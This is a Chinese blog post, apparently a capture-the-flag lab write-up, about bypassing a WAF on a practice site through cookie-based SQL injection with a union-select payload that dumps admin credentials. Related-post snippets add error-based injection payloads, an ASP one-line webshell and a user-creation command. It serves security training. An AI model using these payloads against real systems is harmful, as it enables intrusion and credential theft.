封神台尤里的复仇1第二章:遇到阻难!绕过WAF过滤

最新推荐文章于 2024-05-13 17:17:27 发布
最新推荐文章于 2024-05-13 17:17:27 发布
阅读量315 收藏
点赞数 6
分类专栏: 网络对抗 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63002183/article/details/133758517
版权

进入题目:

打开ModHeader插件:(前面一篇文章给出了如何下载和打开该插件,大家有兴趣可以看看,这里就不赘述了)

出现这个页面:

填写请求头:id=1171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin

浏览器端在http://g8wepfcp.ia.aqlab.cn 后加入/shownews.asp,回车:

往下翻,出现账号和密码:

将密码md5解密:

用御剑进行扫描,获得后台地址:

输入之前获得的用户名和密码:

成功拿到flag:

这篇文章就到这里了,希望能对大家有所帮助。与大家共勉。

封神台第二关
weixin_44106116的博客
11-21 2271
1第一种方法 1 查看是否能够SQL注入 点开第一个新闻,用and 1=1 查看是否存在SQL注入,发现弹出禁用参数对话框 再使用order by ,查看共有几个字段,发现order by 可以用,共十个 因为网页的防护,一般只拦截GET和POST,忽略了cookie也可以传参。所以尝试cookie注入 1.1附加知识点 cookie 类型为“小型文本文件”,是网站给客户端的身份证,由客户端暂时或...
封神台----尤里复仇I-第二章:遇到阻难绕过WAF过滤
正在学习的路上...
07-18 3607
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
封神台靶场 kali训练营第二关WP
qq_54060725的博客
05-26 1082
封神台靶场 kali训练营第二关WP
封神台--第二章:遇到阻难绕过WAF过滤!解题思路
04-12 6151
封神台--第二章:遇到阻难绕过WAF过滤!解题思路 一、查找sql注入点 进入测试页面http://59.63.200.79:8004/ 1)字符型、数字型等盲注尝试 随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下 网站对请求地址进行了WAF防护,通过测试没有过滤 ==order by、union== 网页防护一般只拦截get、post传参,因此尝试cookie注入 2)cookie注入 cookie注入提交的参数以cookie方式提交,判断步骤 1.找到...
mbp 封神台靶场 二(笔记)
qq_43558415的博客
02-09 1765
打开第二关的链接,是一个雕塑网页,点开各个链接查看,在新闻动态里点开了一个新闻,发现了熟悉的身影。 常理,还是用上一关的方法来测试一下,看看有没有注入点,页面显示数据库出错,即可注入。 之后order by函数判断字段数,可知字段数为10。 老步骤,知道字段数之后判断回显点,输入union select 0,1,2,3,4,5,6,7,8,9 ...
封神台靶场---尤里复仇Ⅰ小芳!---第二章遇到阻难绕过WAF过滤
qq_44336568的博客
06-28 2816
封神台----尤里复仇I-第二章:遇到阻难绕过WAF过滤!渗透学习、靶场练习
封神台----尤里复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1573
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】
红凳子的博客
05-07 2211
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 封神台靶场-第一章:为了女神小芳!【SQL注入攻击原理】前言判断是否存在SQL注入漏洞二、使用步骤1.引入库2.读入数据总结 前言 提示:通过sql注入拿到管理员密码! 尤里正在追女神小芳,在得知小芳开了一家公司后,尤里通过whois查询发现了小芳公司网站,学过一点黑客技术的他,想在女神面前炫炫技。于是他打开了传送门 判断是否存在SQL注入漏洞 示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建的。 二
封神台----尤里复仇I-第五章:进击!拿到Web最高权限!
正在学习的路上...
07-18 1997
1.使用cookie进入后台 根据提示信息 需要用到上个关卡的cookie,去XSS平台拿到cookie,删去flag=zkz{****}, 点击之前,打开Burp,进行抓包,替换cookie 放行,进入后台页面。 2.找上传点 在产品管理-添加产品中可以上传图片。 上传带asp一句话的图片, asp一句话:<%eval request (“hacker”)%> 木马一般会被拦截...
封神台尤里复仇Ⅱ 回归)绕过防护getshell
Bu2n的博客
01-05 3573
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
封神台 第二章 绕过WAF
m0_65712192的博客
10-14 888
封神台 第二章 利用ModHeader绕过WAF
SQL注入攻击2(基础)
scholar_1的博客
07-10 636
今天,书生带来封神台在线演练靶场的第二关(接着写两篇看看反响如何,不行就停了)第一步:清楚需求是什么根据文字描述可以清楚,这关的要求是绕过防火墙进入后台并拿走通关钥匙(这种逻辑思路一定要清晰,要不然你都不知道要干什么)点击传送门,出现了如下页面(浏览器不支持Adobe Flash Player了,图片显不出来,有点尴尬): 随便在新闻动态内点开一条新闻链接: 可以看见页面连接显示的是: 其中shownews.asp是网站下的一个asp动态网页文件,从链接可看出,查询到了168条值(新闻内容)。第二步,
封神台靶场-尤里复仇-第二章
weixin_58373549的博客
01-29 744
封神台靶场-尤里复仇-第二章:遇到阻难绕过WAF过滤!【配套课时:SQL注入攻击原理 实战演练】
封神台-第二章 尤里复仇
ploto_cs的博客
09-26 2130
封神台-第二章 尤里复仇 1. 任意选择一条新闻动态 2. 发现出现交互界面 url中id=170 存在注入点 3.判断字段数 ?id=170+order+by+10 ?id=170+order+by+11 4.使用modheader 直接在url中输入 报错 第一个字段写cookie 第二个字段 id=170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+from+admin 5.在url中输入http://59.63.200.79:8004/shownews.asp
封神台 尤里复仇II 回归 信息收集1&&2
shierbai的博客
05-13 392
正常去做信息收集时,看到config文件都是见猎心喜的,这里虽然没直接写flag,但也该多尝试,事实证明,这个尝试是正确的。这里说有sql注入,那么就要找注入点,之前把熊海cms这个指纹识别了,直接去搜索一波。其实在页面源码处也能看到一些可能存在sql注入的点,(这里也是到处点了一波,例如什么。一个可疑的files,一堆php和txt里脱颖而出,对files进行目录扫描。这里被遮住感觉是提示,但说了是基础目录扫描,御剑启动!找到这个,但感觉是后面可能用的,说明是熊海cms。
封神台尤里复仇Ⅱ 回归)渗透第一步 信息收集1
Bu2n的博客
01-02 5056
前言解题过程 前言 做这道题的时候,我的心情真是跌宕起伏。。为什么这么说,且听我娓娓道来。 解题过程 打开传送门,被传送到这个网站 随便点了几个模块,感觉都没有可利用的漏洞,直接扫描目录去了 扫到了admin目录,这个应该是后台登录网址,打开一看果然是 一开始密码暴力破解,没有破解到,开始有点烦躁。 (暴力破解.jpg)这里就不放burp破解的图了,有兴趣可以自己去试 然后想是否存在sql注入绕过密码登录的方法,试了试 无果 那报错注入呢? 输入 ' or gtid_subset(concat.
尤里复仇II 回归 sqlmap和基础绕过
最新发布
shierbai的博客
05-13 243
这里extractvalue也试过了,但奈何就是爆unknown,不过此处列名已经列出。单独测试and '1'='1时并未报错,但报错注入语句时and被处理,需要进行绕过绕过方法不唯一,这里用百分号和双写绕过,没有回显,联合查询注入遗憾退场,试试报错。找到后台,这是一个有数据交互的页面,测试一下是否有sql注入。这里要求手工注入了,看了一圈差不多都是这种格式,那就试一下。像这种需要输入的一般都是post类型的,抓包看看参数。易如反掌啊易如反掌,闭合条件也出来了。得出账密,加密了的话就丢进去解密。
封神台尤里复仇),信息收集1--靶场练习,纯手工注入
久恙502的博客
10-10 782
尤里复仇,做过一遍重新复现一次,练习渗透测试
尤里复仇WIN10全屏补丁,解决黑屏问题
1.尤里复仇尤里复仇是指《红色警戒2:尤里复仇》(Command & Conquer: Red Alert 2 - Yuri's Revenge),这是一款在2001年发布的即时战略游戏,由Westwood Studios开发。游戏的特色在于引入了新的力量“尤里”,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

七月初七淮水竹亭~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值